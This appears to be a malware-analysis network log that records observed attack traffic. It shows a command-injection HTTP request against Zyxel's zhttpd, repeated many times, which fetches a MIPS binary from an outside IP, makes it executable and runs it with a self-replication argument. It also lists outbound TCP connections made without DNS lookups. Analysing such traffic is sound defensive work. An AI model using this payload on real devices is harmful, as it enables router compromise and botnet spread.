          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: unknownTCP traffic detected without corresponding DNS query: 4.65.119.41
          Source: unknownTCP traffic detected without corresponding DNS query: 165.136.137.41
          Source: unknownTCP traffic detected without corresponding DNS query: 157.117.71.31
          Source: unknownTCP traffic detected without corresponding DNS query: 157.201.126.44
          Source: unknownTCP traffic detected without corresponding DNS query: 197.132.74.147
          Source: unknownTCP traffic detected without corresponding DNS query: 197.43.69.122
          Source: unknownTCP traffic detected without corresponding DNS query: 1.50.23.168
          Source: unknownTCP traffic detected without corresponding DNS query: 197.35.197.40
          Source: unknownTCP traffic detected without corresponding DNS query: 41.102.198.251
          Source: unknownTCP traffic detected without corresponding DNS query: 93.206.72.121
          Source: unknownTCP traffic detected without corresponding DNS query: 170.38.36.42
          Source: unknownTCP traffic detected without corresponding DNS query: 157.108.43.123
          Source: unknownTCP traffic detected without corresponding DNS query: 197.160.199.110
          Source: unknownTCP traffic detected without corresponding DNS query: 41.176.230.251
          Source: unknownTCP traffic detected without corresponding DNS query: 41.159.194.242
          Source: unknownTCP traffic detected without corresponding DNS query: 41.172.74.24
          Source: unknownTCP traffic detected without corresponding DNS query: 197.98.250.36
          Source: unknownTCP traffic detected without corresponding DNS query: 41.165.236.234
          Source: unknownTCP traffic detected without corresponding DNS query: 89.33.175.243
          Source: unknownTCP traffic detected without corresponding DNS query: 186.229.169.121
          Source: unknownTCP traffic detected without corresponding DNS query: 90.164.137.113
          Source: unknownTCP traffic detected without corresponding DNS query: 106.173.238.100
          Source: unknownTCP traffic detected without corresponding DNS query: 157.119.197.172
          Source: unknownTCP traffic detected without corresponding DNS query: 197.1.158.224
          Source: unknownTCP traffic detected without corresponding DNS query: 41.173.13.225
          Source: unknownTCP traffic detected without corresponding DNS query: 197.43.54.75
          Source: unknownTCP traffic detected without corresponding DNS query: 157.178.37.183
          Source: unknownTCP traffic detected without corresponding DNS query: 157.68.85.23
          Source: unknownTCP traffic detected without corresponding DNS query: 157.164.208.105
          Source: unknownTCP traffic detected without corresponding DNS query: 157.33.46.173
          Source: unknownTCP traffic detected without corresponding DNS query: 197.63.19.155
          Source: unknownTCP traffic detected without corresponding DNS query: 150.250.123.68
          Source: unknownTCP traffic detected without corresponding DNS query: 157.225.197.84
          Source: unknownTCP traffic detected without corresponding DNS query: 157.59.8.98
          Source: unknownTCP traffic detected without corresponding DNS query: 41.33.53.219
          Source: unknownTCP traffic detected without corresponding DNS query: 41.178.47.80
          Source: unknownTCP traffic detected without corresponding DNS query: 157.194.196.183
          Source: unknownTCP traffic detected without corresponding DNS query: 157.109.188.200
          Source: unknownTCP traffic detected without corresponding DNS query: 197.195.219.16
          Source: unknownTCP traffic detected without corresponding DNS query: 52.184.19.148
          Source: unknownTCP traffic detected without corresponding DNS query: 138.254.74.90
          Source: unknownTCP traffic detected without corresponding DNS query: 41.247.191.74
          Source: unknownTCP traffic detected without corresponding DNS query: 157.36.27.137
          Source: unknownTCP traffic detected without corresponding DNS query: 17.65.59.81
          Source: unknownTCP traffic detected without corresponding DNS query: 111.245.119.125
          Source: unknownTCP traffic detected without corresponding DNS query: 197.232.139.192
          Source: unknownTCP traffic detected without corresponding DNS query: 41.171.97.55
          Source: unknownTCP traffic detected without corresponding DNS query: 197.190.59.4
          Source: unknownTCP traffic detected without corresponding DNS query: 41.228.195.45
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
